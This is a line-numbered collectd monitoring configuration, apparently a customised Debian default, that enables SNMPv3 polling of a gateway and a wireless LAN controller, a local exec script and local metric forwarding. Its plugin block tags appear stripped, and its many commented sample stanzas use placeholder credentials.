-------------------------------------------------------------------------------- 1 | # Config file for collectd(1). 2 | # 3 | # Some plugins need additional configuration and are disabled by default. 4 | # Please read collectd.conf(5) for details. 5 | # 6 | # You should also read /usr/share/doc/collectd-core/README.Debian.plugins 7 | # before enabling any more plugins. 8 | 9 | ############################################################################## 10 | # Global # 11 | #----------------------------------------------------------------------------# 12 | # Global settings for the daemon. # 13 | ############################################################################## 14 | 15 | #Hostname "localhost" 16 | FQDNLookup false 17 | #BaseDir "/var/lib/collectd" 18 | #PluginDir "/usr/lib/collectd" 19 | #TypesDB "/usr/share/collectd/types.db" "/etc/collectd/types.db.local" 20 | 21 | #----------------------------------------------------------------------------# 22 | # When enabled, plugins are loaded automatically with the default options # 23 | # when an appropriate block is encountered. # 24 | # Disabled by default. # 25 | #----------------------------------------------------------------------------# 26 | #AutoLoadPlugin false 27 | 28 | #----------------------------------------------------------------------------# 29 | # When enabled, internal statistics are collected, using "collectd" as the # 30 | # plugin name. # 31 | # Disabled by default. # 32 | #----------------------------------------------------------------------------# 33 | #CollectInternalStats false 34 | 35 | #----------------------------------------------------------------------------# 36 | # Interval at which to query values. 
This may be overwritten on a per-plugin # 37 | # base by using the 'Interval' option of the LoadPlugin block: # 38 | # # 39 | # Interval 60 # 40 | # # 41 | #----------------------------------------------------------------------------# 42 | Interval 120 43 | #Interval 300 44 | 45 | 46 | #MaxReadInterval 86400 47 | #Timeout 2 48 | #ReadThreads 5 49 | #WriteThreads 5 50 | 51 | # Limit the size of the write queue. Default is no limit. Setting up a limit 52 | # is recommended for servers handling a high volume of traffic. 53 | #WriteQueueLimitHigh 1000000 54 | #WriteQueueLimitLow 800000 55 | 56 | ############################################################################## 57 | # Logging # 58 | #----------------------------------------------------------------------------# 59 | # Plugins which provide logging functions should be loaded first, so log # 60 | # messages generated when loading or configuring other plugins can be # 61 | # accessed. # 62 | ############################################################################## 63 | 64 | LoadPlugin logfile 65 | LoadPlugin syslog 66 | #LoadPlugin log_logstash 67 | 68 | 69 | LogLevel "debug" 70 | File "/var/log/collectd.log" 71 | Timestamp true 72 | # PrintSeverity false 73 | 74 | 75 | 76 | LogLevel debug 77 | 78 | 79 | # 80 | # LogLevel info 81 | # File "/var/log/collectd.json.log" 82 | # 83 | 84 | ############################################################################## 85 | # LoadPlugin section # 86 | #----------------------------------------------------------------------------# 87 | # Specify what features to activate. 
# 88 | ############################################################################## 89 | 90 | #LoadPlugin aggregation 91 | #LoadPlugin amqp 92 | #LoadPlugin apache 93 | #LoadPlugin apcups 94 | #LoadPlugin ascent 95 | #LoadPlugin barometer 96 | #LoadPlugin battery 97 | #LoadPlugin bind 98 | #LoadPlugin ceph 99 | #LoadPlugin cgroups 100 | #LoadPlugin conntrack 101 | #LoadPlugin contextswitch 102 | LoadPlugin cpu 103 | #LoadPlugin cpufreq 104 | #LoadPlugin csv 105 | #LoadPlugin curl 106 | #LoadPlugin curl_json 107 | #LoadPlugin curl_xml 108 | #LoadPlugin dbi 109 | LoadPlugin df 110 | #LoadPlugin disk 111 | #LoadPlugin dns 112 | #LoadPlugin drbd 113 | #LoadPlugin email 114 | #LoadPlugin entropy 115 | #LoadPlugin ethstat 116 | LoadPlugin exec 117 | #LoadPlugin fhcount 118 | #LoadPlugin filecount 119 | #LoadPlugin fscache 120 | #LoadPlugin gmond 121 | #LoadPlugin hddtemp 122 | LoadPlugin interface 123 | #LoadPlugin ipc 124 | #LoadPlugin ipmi 125 | #LoadPlugin iptables 126 | #LoadPlugin ipvs 127 | #LoadPlugin irq 128 | #LoadPlugin java 129 | LoadPlugin load 130 | #LoadPlugin lvm 131 | #LoadPlugin madwifi 132 | #LoadPlugin mbmon 133 | #LoadPlugin md 134 | #LoadPlugin memcachec 135 | #LoadPlugin memcached 136 | LoadPlugin memory 137 | #LoadPlugin modbus 138 | #LoadPlugin multimeter 139 | #LoadPlugin mysql 140 | #LoadPlugin netlink 141 | LoadPlugin network 142 | #LoadPlugin nfs 143 | #LoadPlugin nginx 144 | #LoadPlugin notify_desktop 145 | #LoadPlugin notify_email 146 | #LoadPlugin ntpd 147 | #LoadPlugin numa 148 | #LoadPlugin nut 149 | #LoadPlugin olsrd 150 | #LoadPlugin openldap 151 | #LoadPlugin openvpn 152 | #LoadPlugin perl 153 | #LoadPlugin pinba 154 | #LoadPlugin ping 155 | #LoadPlugin postgresql 156 | #LoadPlugin powerdns 157 | LoadPlugin processes 158 | #LoadPlugin protocols 159 | #LoadPlugin python 160 | #LoadPlugin redis 161 | #LoadPlugin rrdcached 162 | LoadPlugin rrdtool 163 | #LoadPlugin sensors 164 | #LoadPlugin serial 165 | #LoadPlugin sigrok 166 | 
#LoadPlugin smart 167 | LoadPlugin snmp 168 | #LoadPlugin statsd 169 | #LoadPlugin swap 170 | #LoadPlugin table 171 | #LoadPlugin tail 172 | #LoadPlugin tail_csv 173 | #LoadPlugin tcpconns 174 | #LoadPlugin teamspeak2 175 | #LoadPlugin ted 176 | #LoadPlugin thermal 177 | #LoadPlugin tokyotyrant 178 | #LoadPlugin turbostat 179 | #LoadPlugin unixsock 180 | #LoadPlugin uptime 181 | LoadPlugin users 182 | #LoadPlugin uuid 183 | #LoadPlugin varnish 184 | #LoadPlugin virt 185 | #LoadPlugin vmem 186 | #LoadPlugin vserver 187 | #LoadPlugin wireless 188 | #LoadPlugin write_graphite 189 | #LoadPlugin write_http 190 | #LoadPlugin write_kafka 191 | #LoadPlugin write_log 192 | #LoadPlugin write_redis 193 | #LoadPlugin write_riemann 194 | #LoadPlugin write_sensu 195 | #LoadPlugin write_tsdb 196 | #LoadPlugin zfs_arc 197 | #LoadPlugin zookeeper 198 | 199 | ############################################################################## 200 | # Plugin configuration # 201 | #----------------------------------------------------------------------------# 202 | # In this section configuration stubs for each plugin are provided. A desc- # 203 | # ription of those options is available in the collectd.conf(5) manual page. 
# 204 | ############################################################################## 205 | 206 | # 207 | # 208 | # #Host "unspecified" 209 | # Plugin "cpu" 210 | # PluginInstance "/[0,2,4,6,8]$/" 211 | # Type "cpu" 212 | # #TypeInstance "unspecified" 213 | # 214 | # SetPlugin "cpu" 215 | # SetPluginInstance "even-%{aggregation}" 216 | # 217 | # GroupBy "Host" 218 | # GroupBy "TypeInstance" 219 | # 220 | # CalculateNum false 221 | # CalculateSum false 222 | # CalculateAverage true 223 | # CalculateMinimum false 224 | # CalculateMaximum false 225 | # CalculateStddev false 226 | # 227 | # 228 | 229 | # 230 | # 231 | # Host "localhost" 232 | # Port "5672" 233 | # VHost "/" 234 | # User "guest" 235 | # Password "guest" 236 | # Exchange "amq.fanout" 237 | # RoutingKey "collectd" 238 | # Persistent false 239 | # StoreRates false 240 | # ConnectionRetryDelay 0 241 | # 242 | # 243 | 244 | # 245 | # 246 | # URL "http://localhost/server-status?auto" 247 | # User "www-user" 248 | # Password "secret" 249 | # VerifyPeer false 250 | # VerifyHost false 251 | # CACert "/etc/ssl/ca.crt" 252 | # Server "apache" 253 | # 254 | # 255 | # 256 | # URL "http://some.domain.tld/status?auto" 257 | # Host "some.domain.tld" 258 | # Server "lighttpd" 259 | # 260 | # 261 | 262 | # 263 | # Host "localhost" 264 | # Port "3551" 265 | # ReportSeconds true 266 | # 267 | 268 | # 269 | # URL "http://localhost/ascent/status/" 270 | # User "www-user" 271 | # Password "secret" 272 | # VerifyPeer false 273 | # VerifyHost false 274 | # CACert "/etc/ssl/ca.crt" 275 | # 276 | 277 | # 278 | # Device "/dev/i2c-0"; 279 | # Oversampling 512 280 | # PressureOffset 0.0 281 | # TemperatureOffset 0.0 282 | # Normalization 2 283 | # Altitude 238.0 284 | # TemperatureSensor "myserver/onewire-F10FCA000800/temperature" 285 | # 286 | 287 | # 288 | # ValuesPercentage false 289 | # ReportDegraded false 290 | # 291 | 292 | # 293 | # URL "http://localhost:8053/" 294 | # 295 | # ParseTime false 296 | # 297 | # OpCodes true 
298 | # QTypes true 299 | # ServerStats true 300 | # ZoneMaintStats true 301 | # ResolverStats false 302 | # MemoryStats true 303 | # 304 | # 305 | # QTypes true 306 | # ResolverStats true 307 | # CacheRRSets true 308 | # 309 | # Zone "127.in-addr.arpa/IN" 310 | # 311 | # 312 | 313 | # 314 | # LongRunAvgLatency false 315 | # ConvertSpecialMetricTypes true 316 | # 317 | # SocketPath "/var/run/ceph/ceph-osd.0.asok" 318 | # 319 | # 320 | # SocketPath "/var/run/ceph/ceph-osd.1.asok" 321 | # 322 | # 323 | # SocketPath "/var/run/ceph/ceph-mon.ceph1.asok" 324 | # 325 | # 326 | # SocketPath "/var/run/ceph/ceph-mds.ceph1.asok" 327 | # 328 | # 329 | 330 | # 331 | # CGroup "libvirt" 332 | # IgnoreSelected false 333 | # 334 | 335 | # 336 | # ReportByCpu true 337 | # ReportByState true 338 | # ValuesPercentage false 339 | # 340 | 341 | # 342 | # DataDir "/var/lib/collectd/csv" 343 | # StoreRates false 344 | # 345 | 346 | # 347 | # 348 | # URL "http://finance.google.com/finance?q=NYSE%3AAMD" 349 | # User "foo" 350 | # Password "bar" 351 | # Digest false 352 | # VerifyPeer true 353 | # VerifyHost true 354 | # CACert "/path/to/ca.crt" 355 | # Header "X-Custom-Header: foobar" 356 | # Post "foo=bar" 357 | # 358 | # MeasureResponseTime false 359 | # MeasureResponseCode false 360 | # 361 | # Regex "]*> *([0-9]*\\.[0-9]+) *" 362 | # DSType "GaugeAverage" 363 | # Type "stock_value" 364 | # Instance "AMD" 365 | # 366 | # 367 | # 368 | 369 | # 370 | ## See: http://wiki.apache.org/couchdb/Runtime_Statistics 371 | # 372 | # Instance "httpd" 373 | # 374 | # Type "http_requests" 375 | # 376 | # 377 | # 378 | # Type "http_request_methods" 379 | # 380 | # 381 | # 382 | # Type "http_response_codes" 383 | # 384 | # 385 | ## Database status metrics: 386 | # 387 | # Instance "dbs" 388 | # 389 | # Type "gauge" 390 | # 391 | # 392 | # Type "counter" 393 | # 394 | # 395 | # Type "bytes" 396 | # 397 | # 398 | # 399 | 400 | # 401 | # 402 | # Host "my_host" 403 | # Instance "some_instance" 404 | # User 
"collectd" 405 | # Password "thaiNg0I" 406 | # Digest false 407 | # VerifyPeer true 408 | # VerifyHost true 409 | # CACert "/path/to/ca.crt" 410 | # Header "X-Custom-Header: foobar" 411 | # Post "foo=bar" 412 | # 413 | # 414 | # Type "magic_level" 415 | # InstancePrefix "prefix-" 416 | # InstanceFrom "td[1]" 417 | # ValuesFrom "td[2]/span[@class=\"level\"]" 418 | # 419 | # 420 | # 421 | 422 | # 423 | # 424 | # Statement "SELECT 'customers' AS c_key, COUNT(*) AS c_value \ 425 | # FROM customers_tbl" 426 | # MinVersion 40102 427 | # MaxVersion 50042 428 | # 429 | # Type "gauge" 430 | # InstancePrefix "customer" 431 | # InstancesFrom "c_key" 432 | # ValuesFrom "c_value" 433 | # 434 | # 435 | # 436 | # 437 | # Driver "mysql" 438 | # DriverOption "host" "localhost" 439 | # DriverOption "username" "collectd" 440 | # DriverOption "password" "secret" 441 | # DriverOption "dbname" "custdb0" 442 | # SelectDB "custdb0" 443 | # Query "num_of_customers" 444 | # Query "..." 445 | # Host "..." 446 | # 447 | # 448 | 449 | 450 | # Device "/dev/sda1" 451 | # Device "192.168.0.2:/mnt/nfs" 452 | # MountPoint "/home" 453 | # FSType "ext3" 454 | 455 | # ignore rootfs; else, the root file-system would appear twice, causing 456 | # one of the updates to fail and spam the log 457 | FSType rootfs 458 | # ignore the usual virtual / temporary file-systems 459 | FSType sysfs 460 | FSType proc 461 | FSType devtmpfs 462 | FSType devpts 463 | FSType tmpfs 464 | FSType fusectl 465 | FSType cgroup 466 | IgnoreSelected true 467 | 468 | # ReportByDevice false 469 | # ReportInodes false 470 | 471 | # ValuesAbsolute true 472 | # ValuesPercentage false 473 | 474 | 475 | # 476 | # Disk "hda" 477 | # Disk "/sda[23]/" 478 | # IgnoreSelected false 479 | # UseBSDName false 480 | # UdevNameAttr "DEVNAME" 481 | # 482 | 483 | # 484 | # Interface "eth0" 485 | # IgnoreSource "192.168.0.1" 486 | # SelectNumericQueryTypes false 487 | # 488 | 489 | # 490 | # SocketFile "/var/run/collectd-email" 491 | # SocketGroup 
"collectd" 492 | # SocketPerms "0770" 493 | # MaxConns 5 494 | # 495 | 496 | # 497 | # Interface "eth0" 498 | # Map "rx_csum_offload_errors" "if_rx_errors" "checksum_offload" 499 | # Map "multicast" "if_multicast" 500 | # MappedOnly false 501 | # 502 | 503 | 504 | Exec "$user" "/home/$user/scripts/snmp_gw_wlc_troopers.py" "collectd" 505 | 506 | # Exec user "/path/to/exec" 507 | # Exec "user:group" "/path/to/exec" 508 | # NotificationExec user "/path/to/exec" 509 | 510 | 511 | # 512 | # ValuesAbsolute true 513 | # ValuesPercentage false 514 | # 515 | 516 | # 517 | # 518 | # Instance "foodir" 519 | # Name "*.conf" 520 | # MTime "-5m" 521 | # Size "+10k" 522 | # Recursive true 523 | # IncludeHidden false 524 | # 525 | # 526 | 527 | # 528 | # MCReceiveFrom "239.2.11.71" "8649" 529 | # 530 | # 531 | # Type "swap" 532 | # TypeInstance "total" 533 | # DataSource "value" 534 | # 535 | # 536 | # 537 | # Type "swap" 538 | # TypeInstance "free" 539 | # DataSource "value" 540 | # 541 | # 542 | 543 | # 544 | # Host "127.0.0.1" 545 | # Port 7634 546 | # 547 | 548 | 549 | Interface "ens33" 550 | Interface "ens34" 551 | Interface "lo" 552 | # IgnoreSelected false 553 | 554 | 555 | # 556 | # Sensor "some_sensor" 557 | # Sensor "another_one" 558 | # IgnoreSelected false 559 | # NotifySensorAdd false 560 | # NotifySensorRemove true 561 | # NotifySensorNotPresent false 562 | # 563 | 564 | # 565 | # Chain "table" "chain" 566 | # Chain6 "table" "chain" 567 | # 568 | 569 | # 570 | # Irq 7 571 | # Irq 8 572 | # Irq 9 573 | # IgnoreSelected true 574 | # 575 | 576 | # 577 | # JVMArg "-verbose:jni" 578 | # JVMArg "-Djava.class.path=/usr/share/collectd/java/collectd-api.jar" 579 | # 580 | # LoadPlugin "org.collectd.java.GenericJMX" 581 | # 582 | # # See /usr/share/doc/collectd/examples/GenericJMX.conf 583 | # # for an example config. 
584 | # 585 | # 586 | 587 | # 588 | # ReportRelative true 589 | # 590 | 591 | # 592 | # Interface "wlan0" 593 | # IgnoreSelected false 594 | # Source "SysFS" 595 | # WatchSet "None" 596 | # WatchAdd "node_octets" 597 | # WatchAdd "node_rssi" 598 | # WatchAdd "is_rx_acl" 599 | # WatchAdd "is_scan_active" 600 | # 601 | 602 | # 603 | # Host "127.0.0.1" 604 | # Port 411 605 | # 606 | 607 | # 608 | # Device "/dev/md0" 609 | # IgnoreSelected false 610 | # 611 | 612 | # 613 | # 614 | # Server "localhost" 615 | # Key "page_key" 616 | # 617 | # Regex "(\\d+) bytes sent" 618 | # ExcludeRegex "" 619 | # DSType CounterAdd 620 | # Type "ipt_octets" 621 | # Instance "type_instance" 622 | # 623 | # 624 | # 625 | 626 | # 627 | # 628 | # Socket "/var/run/memcached.sock" 629 | # or: 630 | # Host "127.0.0.1" 631 | # Port "11211" 632 | # 633 | # 634 | 635 | 636 | # ValuesAbsolute true 637 | # ValuesPercentage false 638 | ValuesPercentage true 639 | 640 | 641 | # 642 | # 643 | # RegisterBase 1234 644 | # RegisterCmd ReadHolding 645 | # RegisterType float 646 | # Type gauge 647 | # Instance "..." 
648 | # 649 | # 650 | # 651 | # Address "addr" 652 | # Port "1234" 653 | # Interval 60 654 | # 655 | # 656 | # Instance "foobar" # optional 657 | # Collect "data_name" 658 | # 659 | # 660 | # 661 | 662 | # 663 | # 664 | # Host "database.serv.er" 665 | # Port "3306" 666 | # User "db_user" 667 | # Password "secret" 668 | # Database "db_name" 669 | # MasterStats true 670 | # ConnectTimeout 10 671 | # InnodbStats true 672 | # 673 | # 674 | # 675 | # Alias "squeeze" 676 | # Host "localhost" 677 | # Socket "/var/run/mysql/mysqld.sock" 678 | # SlaveStats true 679 | # SlaveNotifications true 680 | # 681 | # 682 | 683 | # 684 | # Interface "All" 685 | # VerboseInterface "All" 686 | # QDisc "eth0" "pfifo_fast-1:0" 687 | # Class "ppp0" "htb-1:10" 688 | # Filter "ppp0" "u32-1:0" 689 | # IgnoreSelected false 690 | # 691 | 692 | 693 | # # client setup: 694 | Server "127.0.0.1" "25001" 695 | # Server "ff18::efc0:4a42" "25826" 696 | # 697 | # SecurityLevel Encrypt 698 | # Username "user" 699 | # Password "secret" 700 | # Interface "eth0" 701 | # ResolveInterval 14400 702 | # 703 | # TimeToLive 128 704 | # 705 | # # server setup: 706 | # Listen "ff18::efc0:4a42" "25826" 707 | # 708 | # SecurityLevel Sign 709 | # AuthFile "/etc/collectd/passwd" 710 | # Interface "eth0" 711 | # 712 | # MaxPacketSize 1452 713 | # 714 | # # proxy setup (client and server as above): 715 | # Forward true 716 | # 717 | # # statistics about the network plugin itself 718 | # ReportStats false 719 | # 720 | # # "garbage collection" 721 | # CacheFlush 1800 722 | 723 | 724 | # 725 | # URL "http://localhost/status?auto" 726 | # User "www-user" 727 | # Password "secret" 728 | # VerifyPeer false 729 | # VerifyHost false 730 | # CACert "/etc/ssl/ca.crt" 731 | # 732 | 733 | # 734 | # OkayTimeout 1000 735 | # WarningTimeout 5000 736 | # FailureTimeout 0 737 | # 738 | 739 | # 740 | # SMTPServer "localhost" 741 | # SMTPPort 25 742 | # SMTPUser "my-username" 743 | # SMTPPassword "my-password" 744 | # From 
"collectd@main0server.com" 745 | # # on . 746 | # # Beware! Do not use not more than two placeholders (%)! 747 | # Subject "[collectd] %s on %s!" 748 | # Recipient "email1@domain1.net" 749 | # Recipient "email2@domain2.com" 750 | # 751 | 752 | # 753 | # Host "localhost" 754 | # Port 123 755 | # ReverseLookups false 756 | # IncludeUnitID true 757 | # 758 | 759 | # 760 | # UPS "upsname@hostname:port" 761 | # 762 | 763 | # 764 | # Host "127.0.0.1" 765 | # Port "2006" 766 | # CollectLinks "Summary" 767 | # CollectRoutes "Summary" 768 | # CollectTopology "Summary" 769 | # 770 | 771 | # 772 | # 773 | # URL "ldap://localhost:389" 774 | # StartTLS false 775 | # VerifyHost true 776 | # CACert "/path/to/ca.crt" 777 | # Timeout -1 778 | # Version 3 779 | # 780 | # 781 | 782 | # 783 | # StatusFile "/etc/openvpn/openvpn-status.log" 784 | # ImprovedNamingSchema false 785 | # CollectCompression true 786 | # CollectIndividualUsers true 787 | # CollectUserCount false 788 | # 789 | 790 | # 791 | # IncludeDir "/my/include/path" 792 | # BaseName "Collectd::Plugins" 793 | # EnableDebugger "" 794 | # LoadPlugin Monitorus 795 | # LoadPlugin OpenVZ 796 | # 797 | # 798 | # Foo "Bar" 799 | # Qux "Baz" 800 | # 801 | # 802 | 803 | # 804 | # Address "::0" 805 | # Port "30002" 806 | # 807 | # Host "host name" 808 | # Server "server name" 809 | # Script "script name" 810 | # 811 | # 812 | 813 | # 814 | # Host "host.foo.bar" 815 | # Host "host.baz.qux" 816 | # Interval 1.0 817 | # Timeout 0.9 818 | # TTL 255 819 | # SourceAddress "1.2.3.4" 820 | # Device "eth0" 821 | # MaxMissed -1 822 | # 823 | 824 | # 825 | # 826 | # Statement "SELECT magic FROM wizard WHERE host = $1;" 827 | # Param hostname 828 | # 829 | # 830 | # Type gauge 831 | # InstancePrefix "magic" 832 | # ValuesFrom "magic" 833 | # 834 | # 835 | # 836 | # 837 | # Statement "SELECT COUNT(type) AS count, type \ 838 | # FROM (SELECT CASE \ 839 | # WHEN resolved = 'epoch' THEN 'open' \ 840 | # ELSE 'resolved' END AS type \ 841 | # FROM 
tickets) type \ 842 | # GROUP BY type;" 843 | # 844 | # 845 | # Type counter 846 | # InstancePrefix "rt36_tickets" 847 | # InstancesFrom "type" 848 | # ValuesFrom "count" 849 | # 850 | # 851 | # 852 | # 853 | # # See /usr/share/doc/collectd-core/examples/postgresql/collectd_insert.sql for details 854 | # Statement "SELECT collectd_insert($1, $2, $3, $4, $5, $6, $7, $8, $9);" 855 | # StoreRates true 856 | # 857 | # 858 | # 859 | # Host "hostname" 860 | # Port 5432 861 | # User "username" 862 | # Password "secret" 863 | # 864 | # SSLMode "prefer" 865 | # KRBSrvName "kerberos_service_name" 866 | # 867 | # Query magic 868 | # 869 | # 870 | # 871 | # Interval 60 872 | # Service "service_name" 873 | # 874 | # Query backend # predefined 875 | # Query rt36_tickets 876 | # 877 | # 878 | # 879 | # Service "collectd_store" 880 | # Writer sqlstore 881 | # # see collectd.conf(5) for details 882 | # CommitInterval 30 883 | # 884 | # 885 | 886 | # 887 | # 888 | # Collect "latency" 889 | # Collect "udp-answers" "udp-queries" 890 | # Socket "/var/run/pdns.controlsocket" 891 | # 892 | # 893 | # Collect "questions" 894 | # Collect "cache-hits" "cache-misses" 895 | # Socket "/var/run/pdns_recursor.controlsocket" 896 | # 897 | # LocalSocket "/opt/collectd/var/run/collectd-powerdns" 898 | # 899 | 900 | # 901 | # Process "name" 902 | # ProcessMatch "foobar" "/usr/bin/perl foobar\\.pl.*" 903 | # 904 | 905 | # 906 | # Value "/^Tcp:/" 907 | # IgnoreSelected false 908 | # 909 | 910 | # 911 | # ModulePath "/path/to/your/python/modules" 912 | # LogTraces true 913 | # Interactive true 914 | # Import "spam" 915 | # 916 | # 917 | # spam "wonderful" "lovely" 918 | # 919 | # 920 | 921 | # 922 | # 923 | # Host "redis.example.com" 924 | # Port "6379" 925 | # Timeout 2000 926 | # 927 | # 928 | 929 | # 930 | # DaemonAddress "unix:/var/run/rrdcached.sock" 931 | # DataDir "/var/lib/rrdcached/db/collectd" 932 | # CreateFiles true 933 | # CreateFilesAsync false 934 | # CollectStatistics true 935 | # 936 | 
# The following settings are rather advanced 937 | # and should usually not be touched: 938 | # StepSize 10 939 | # HeartBeat 20 940 | # RRARows 1200 941 | # RRATimespan 158112000 942 | # XFF 0.1 943 | # 944 | 945 | 946 | DataDir "/var/lib/collectd/rrd" 947 | # CacheTimeout 120 948 | # CacheFlush 900 949 | # WritesPerSecond 30 950 | # CreateFilesAsync false 951 | # RandomTimeout 0 952 | # 953 | # The following settings are rather advanced 954 | # and should usually not be touched: 955 | # StepSize 10 956 | # HeartBeat 20 957 | # RRARows 1200 958 | # RRATimespan 158112000 959 | # XFF 0.1 960 | 961 | 962 | # 963 | # SensorConfigFile "/etc/sensors3.conf" 964 | # Sensor "it8712-isa-0290/temperature-temp1" 965 | # Sensor "it8712-isa-0290/fanspeed-fan3" 966 | # Sensor "it8712-isa-0290/voltage-in8" 967 | # IgnoreSelected false 968 | # 969 | 970 | # 971 | # LogLevel 3 972 | # 973 | # Driver "fluke-dmm" 974 | # MinimumInterval 10 975 | # Conn "/dev/ttyUSB2" 976 | # 977 | # 978 | # Driver "cem-dt-885x" 979 | # Conn "/dev/ttyUSB1" 980 | # 981 | # 982 | 983 | # 984 | # Disk "/^[hs]d[a-f][0-9]?$/" 985 | # IgnoreSelected false 986 | # 987 | 988 | # See /usr/share/doc/collectd/examples/snmp-data.conf.gz for a 989 | # comprehensive sample configuration. 990 | 991 | 992 | Type "if_octets" 993 | Table true 994 | Instance "IF-MIB::ifName" 995 | Values "IF-MIB::ifHCInOctets" "IF-MIB::ifHCOutOctets" 996 | 997 | 998 | Type "if_octets" 999 | Table true 1000 | Instance "IF-MIB::ifName" 1001 | InstancePrefix "ipv4." 1002 | Values "IP-MIB::ipIfStatsHCInOctets.ipv4" "IP-MIB::ipIfStatsHCOutOctets.ipv4" 1003 | 1004 | 1005 | Type "if_octets" 1006 | Table true 1007 | Instance "IF-MIB::ifName" 1008 | InstancePrefix "ipv6." 
1009 | Values "IP-MIB::ipIfStatsHCInOctets.ipv6" "IP-MIB::ipIfStatsHCOutOctets.ipv6" 1010 | 1011 | 1012 | 1013 | Type "wlan_clients" 1014 | Table true 1015 | Instance "SNMPv2-SMI::enterprises.14179.2.1.1.1.2" 1016 | Values "SNMPv2-SMI::enterprises.14179.2.1.1.1.38" 1017 | 1018 | 1019 | Type "aps" 1020 | Table false 1021 | Values "SNMPv2-SMI::enterprises.9.9.618.1.8.4.0" 1022 | #Values "1.3.6.1.4.1.9.9.618.1.8.4.0" 1023 | 1024 | 1025 | # 1026 | # Type "voltage" 1027 | # Table false 1028 | # Instance "input_line1" 1029 | #Instance "IF-MIB::ifDescr" 1030 | # Scale 0.1 1031 | # Values "SNMPv2-SMI::enterprises.6050.5.4.1.1.2.1" 1032 | # 1033 | # 1034 | # Type "users" 1035 | # Table false 1036 | # Instance "" 1037 | # Shift -1 1038 | # Values "HOST-RESOURCES-MIB::hrSystemNumUsers.0" 1039 | # 1040 | # 1041 | # Type "if_octets" 1042 | # Table true 1043 | # InstancePrefix "traffic" 1044 | # Instance "IF-MIB::ifDescr" 1045 | # Values "IF-MIB::ifInOctets" "IF-MIB::ifOutOctets" 1046 | # 1047 | # 1048 | 1049 | Address "$IPv4" 1050 | Version 3 1051 | SecurityLevel "authPriv" 1052 | Username "$user" 1053 | AuthProtocol "SHA" 1054 | AuthPassphrase "$Passphrase" 1055 | PrivacyProtocol "AES" 1056 | PrivacyPassphrase "$Passphrase" 1057 | Collect "gw.bandwidth" "gw.bandwidth.v4" "gw.bandwidth.v6" 1058 | 1059 | 1060 | Address "$IPv4" 1061 | Version 3 1062 | SecurityLevel "authPriv" 1063 | Username "$user" 1064 | AuthProtocol "SHA" 1065 | AuthPassphrase "$Passphrase" 1066 | PrivacyProtocol "AES" 1067 | PrivacyPassphrase "$Passphrase" 1068 | Collect "wlc.clients" "wlc.aps" 1069 | 1070 | 1071 | # 1072 | # Address "192.168.0.2" 1073 | # Version 1 1074 | # Community "community_string" 1075 | # Collect "std_traffic" 1076 | # Inverval 120 1077 | # 1078 | # 1079 | # Address "192.168.0.42" 1080 | # Version 2 1081 | # Community "another_string" 1082 | # Collect "std_traffic" "hr_users" 1083 | # 1084 | # 1085 | # Address "192.168.0.3" 1086 | # Version 1 1087 | # Community "more_communities" 1088 
| # Collect "powerplus_voltge_input" 1089 | # Interval 300 1090 | # 1091 | 1092 | 1093 | # 1094 | # Host "::" 1095 | # Port "8125" 1096 | # DeleteCounters false 1097 | # DeleteTimers false 1098 | # DeleteGauges false 1099 | # DeleteSets false 1100 | # TimerPercentile 90.0 1101 | # TimerPercentile 95.0 1102 | # TimerPercentile 99.0 1103 | # TimerLower false 1104 | # TimerUpper false 1105 | # TimerSum false 1106 | # TimerCount false 1107 | # 1108 | 1109 | # 1110 | # ReportByDevice false 1111 | # ReportBytes true 1112 | # 1113 | 1114 | # 1115 | # 1116 | # Instance "slabinfo" 1117 | # Separator " " 1118 | # 1119 | # Type gauge 1120 | # InstancePrefix "active_objs" 1121 | # InstancesFrom 0 1122 | # ValuesFrom 1 1123 | # 1124 | # 1125 | # Type gauge 1126 | # InstancePrefix "objperslab" 1127 | # InstancesFrom 0 1128 | # ValuesFrom 4 1129 | # 1130 | #
1131 | #
1132 | 1133 | # 1134 | # 1135 | # Instance "exim" 1136 | # Interval 60 1137 | # 1138 | # Regex "S=([1-9][0-9]*)" 1139 | # DSType "CounterAdd" 1140 | # Type "ipt_bytes" 1141 | # Instance "total" 1142 | # 1143 | # 1144 | # Regex "\\" 1145 | # ExcludeRegex "\\.*mail_spool defer" 1146 | # DSType "CounterInc" 1147 | # Type "counter" 1148 | # Instance "local_user" 1149 | # 1150 | # 1151 | # 1152 | 1153 | # 1154 | # 1155 | # Type "percent" 1156 | # Instance "dropped" 1157 | # ValueFrom 1 1158 | # 1159 | # 1160 | # Type "bytes" 1161 | # Instance "wire-realtime" 1162 | # ValueFrom 2 1163 | # 1164 | # 1165 | # Type "alerts_per_second" 1166 | # ValueFrom 3 1167 | # 1168 | # 1169 | # Type "kpackets_wire_per_sec.realtime" 1170 | # ValueFrom 4 1171 | # 1172 | # 1173 | # Instance "snort-eth0" 1174 | # Interval 600 1175 | # Collect "dropped" "mbps" "alerts" "kpps" 1176 | # TimeFrom 0 1177 | # 1178 | # 1179 | 1180 | # 1181 | # ListeningPorts false 1182 | # AllPortsSummary false 1183 | # LocalPort "25" 1184 | # RemotePort "25" 1185 | # 1186 | 1187 | # 1188 | # Host "127.0.0.1" 1189 | # Port "51234" 1190 | # Server "8767" 1191 | # 1192 | 1193 | # 1194 | # Device "/dev/ttyUSB0" 1195 | # Retries 0 1196 | # 1197 | 1198 | # 1199 | # ForceUseProcfs false 1200 | # Device "THRM" 1201 | # IgnoreSelected false 1202 | # 1203 | 1204 | # 1205 | # Host "localhost" 1206 | # Port "1978" 1207 | # 1208 | 1209 | # 1210 | ## None of the following option should be set manually 1211 | ## This plugin automatically detect most optimal options 1212 | ## Only set values here if: 1213 | ## - The module ask you to 1214 | ## - You want to disable the collection of some data 1215 | ## - Your (intel) CPU is not supported (yet) by the module 1216 | ## - The module generate a lot of errors 'MSR offset 0x... 
read failed' 1217 | ## In the last two cases, please open a bug request 1218 | # 1219 | # TCCActivationTemp "100" 1220 | # CoreCstates "392" 1221 | # PackageCstates "396" 1222 | # SystemManagementInterrupt true 1223 | # DigitalTemperatureSensor true 1224 | # PackageThermalManagement true 1225 | # RunningAveragePowerLimit "7" 1226 | # 1227 | 1228 | # 1229 | # SocketFile "/var/run/collectd-unixsock" 1230 | # SocketGroup "collectd" 1231 | # SocketPerms "0660" 1232 | # DeleteSocket false 1233 | # 1234 | 1235 | # 1236 | # UUIDFile "/etc/uuid" 1237 | # 1238 | 1239 | # 1240 | # 1241 | # CollectBackend true 1242 | # CollectBan false # Varnish 3 and above 1243 | # CollectCache true 1244 | # CollectConnections true 1245 | # CollectDirectorDNS false # Varnish 3 only 1246 | # CollectESI false 1247 | # CollectFetch false 1248 | # CollectHCB false 1249 | # CollectObjects false 1250 | # CollectPurge false # Varnish 2 only 1251 | # CollectSession false 1252 | # 